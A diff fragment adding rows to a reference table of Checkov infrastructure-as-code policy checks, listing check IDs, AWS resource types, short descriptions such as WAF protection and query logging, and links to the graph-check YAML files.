+|  876 | CKV2_AWS_20              | resource                         | aws_lb_listener                                                                                  | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  877 | CKV2_AWS_21              | resource                         | aws_iam_group_membership                                                                         | Ensure that all IAM users are members of at least one IAM group.                                                                                                                                         | Terraform               | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml)                                                     |
+|  878 | CKV2_AWS_22              | resource                         | aws_iam_user                                                                                     | Ensure an IAM User does not have access to the console                                                                                                                                                   | Terraform               | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml)                                                                     |
+|  879 | CKV2_AWS_23              | resource                         | aws_route53_record                                                                               | Route53 A Record has Attached Resource                                                                                                                                                                   | Terraform               | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml)                                                           |
+|  880 | CKV2_AWS_27              | resource                         | aws_rds_cluster                                                                                  | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                                     |
+|  881 | CKV2_AWS_27              | resource                         | aws_rds_cluster_parameter_group                                                                  | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                                     |
+|  882 | CKV2_AWS_28              | resource                         | aws_alb                                                                                          | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform               | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                                     |
+|  883 | CKV2_AWS_28              | resource                         | aws_lb                                                                                           | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform               | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                                     |
+|  884 | CKV2_AWS_29              | resource                         | aws_api_gateway_rest_api                                                                         | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform               | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                                     |
+|  885 | CKV2_AWS_29              | resource                         | aws_api_gateway_stage                                                                            | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform               | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                                     |
+|  886 | CKV2_AWS_30              | resource                         | aws_db_instance                                                                                  | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                                       |
+|  887 | CKV2_AWS_30              | resource                         | aws_db_parameter_group                                                                           | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                                       |
+|  888 | CKV2_AWS_31              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF2 has a Logging Configuration                                                                                                                                                                  | Terraform               | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml)                                                                                                 |
+|  889 | CKV2_AWS_32              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution has a response headers policy attached                                                                                                                                    | Terraform               | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml)                                                   |
+|  890 | CKV2_AWS_33              | resource                         | AWS::AppSync::GraphQLApi                                                                         | Ensure AppSync is protected by WAF                                                                                                                                                                       | Cloudformation          | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml)                                                                            |
+|  891 | CKV2_AWS_33              | resource                         | aws_appsync_graphql_api                                                                          | Ensure AppSync is protected by WAF                                                                                                                                                                       | Terraform               | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml)                                                                             |
+|  892 | CKV2_AWS_34              | resource                         | aws_ssm_parameter                                                                                | AWS SSM Parameter should be Encrypted                                                                                                                                                                    | Terraform               | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml)                                                       |
+|  893 | CKV2_AWS_35              | resource                         | aws_route                                                                                        | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform               | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                           |
+|  894 | CKV2_AWS_35              | resource                         | aws_route_table                                                                                  | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform               | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                           |
+|  895 | CKV2_AWS_36              | resource                         | aws_ssm_parameter                                                                                | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform               | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                         |
+|  896 | CKV2_AWS_36              | resource                         | data.http                                                                                        | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform               | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                         |
+|  897 | CKV2_AWS_37              | resource                         | aws                                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  898 | CKV2_AWS_37              | resource                         | aws_accessanalyzer_analyzer                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  899 | CKV2_AWS_37              | resource                         | aws_acm_certificate                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  900 | CKV2_AWS_37              | resource                         | aws_acm_certificate_validation                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  901 | CKV2_AWS_37              | resource                         | aws_acmpca_certificate_authority                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  902 | CKV2_AWS_37              | resource                         | aws_ami                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  903 | CKV2_AWS_37              | resource                         | aws_ami_copy                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  904 | CKV2_AWS_37              | resource                         | aws_ami_from_instance                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  905 | CKV2_AWS_37              | resource                         | aws_ami_launch_permission                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  906 | CKV2_AWS_37              | resource                         | aws_api_gateway_account                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  907 | CKV2_AWS_37              | resource                         | aws_api_gateway_api_key                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  908 | CKV2_AWS_37              | resource                         | aws_api_gateway_authorizer                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  909 | CKV2_AWS_37              | resource                         | aws_api_gateway_base_path_mapping                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  910 | CKV2_AWS_37              | resource                         | aws_api_gateway_client_certificate                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  911 | CKV2_AWS_37              | resource                         | aws_api_gateway_deployment                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  912 | CKV2_AWS_37              | resource                         | aws_api_gateway_documentation_part                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  913 | CKV2_AWS_37              | resource                         | aws_api_gateway_documentation_version                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  914 | CKV2_AWS_37              | resource                         | aws_api_gateway_domain_name                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  915 | CKV2_AWS_37              | resource                         | aws_api_gateway_gateway_response                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  916 | CKV2_AWS_37              | resource                         | aws_api_gateway_integration                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  917 | CKV2_AWS_37              | resource                         | aws_api_gateway_integration_response                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  918 | CKV2_AWS_37              | resource                         | aws_api_gateway_method                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  919 | CKV2_AWS_37              | resource                         | aws_api_gateway_method_response                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  920 | CKV2_AWS_37              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  921 | CKV2_AWS_37              | resource                         | aws_api_gateway_model                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  922 | CKV2_AWS_37              | resource                         | aws_api_gateway_request_validator                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  923 | CKV2_AWS_37              | resource                         | aws_api_gateway_resource                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  924 | CKV2_AWS_37              | resource                         | aws_api_gateway_rest_api                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  925 | CKV2_AWS_37              | resource                         | aws_api_gateway_stage                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  926 | CKV2_AWS_37              | resource                         | aws_api_gateway_usage_plan                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  927 | CKV2_AWS_37              | resource                         | aws_api_gateway_usage_plan_key                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  928 | CKV2_AWS_37              | resource                         | aws_api_gateway_vpc_link                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  929 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_api                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  930 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_api_mapping                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  931 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_authorizer                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  932 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_deployment                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  933 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_domain_name                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  934 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_integration                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  935 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_integration_response                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  936 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_model                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  937 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_route                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  938 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_route_response                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  939 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_stage                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  940 | CKV2_AWS_37              | resource                         | aws_apigatewayv2_vpc_link                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  941 | CKV2_AWS_37              | resource                         | aws_app_cookie_stickiness_policy                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  942 | CKV2_AWS_37              | resource                         | aws_appautoscaling_policy                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  943 | CKV2_AWS_37              | resource                         | aws_appautoscaling_scheduled_action                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  944 | CKV2_AWS_37              | resource                         | aws_appautoscaling_target                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  945 | CKV2_AWS_37              | resource                         | aws_appmesh_mesh                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  946 | CKV2_AWS_37              | resource                         | aws_appmesh_route                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  947 | CKV2_AWS_37              | resource                         | aws_appmesh_virtual_node                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  948 | CKV2_AWS_37              | resource                         | aws_appmesh_virtual_router                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  949 | CKV2_AWS_37              | resource                         | aws_appmesh_virtual_service                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  950 | CKV2_AWS_37              | resource                         | aws_appsync_api_key                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  951 | CKV2_AWS_37              | resource                         | aws_appsync_datasource                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  952 | CKV2_AWS_37              | resource                         | aws_appsync_function                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  953 | CKV2_AWS_37              | resource                         | aws_appsync_graphql_api                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  954 | CKV2_AWS_37              | resource                         | aws_appsync_resolver                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  955 | CKV2_AWS_37              | resource                         | aws_athena_database                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  956 | CKV2_AWS_37              | resource                         | aws_athena_named_query                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  957 | CKV2_AWS_37              | resource                         | aws_athena_workgroup                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  958 | CKV2_AWS_37              | resource                         | aws_autoscaling_attachment                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  959 | CKV2_AWS_37              | resource                         | aws_autoscaling_group                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  960 | CKV2_AWS_37              | resource                         | aws_autoscaling_lifecycle_hook                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  961 | CKV2_AWS_37              | resource                         | aws_autoscaling_notification                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  962 | CKV2_AWS_37              | resource                         | aws_autoscaling_policy                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  963 | CKV2_AWS_37              | resource                         | aws_autoscaling_schedule                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  964 | CKV2_AWS_37              | resource                         | aws_backup_plan                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  965 | CKV2_AWS_37              | resource                         | aws_backup_selection                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
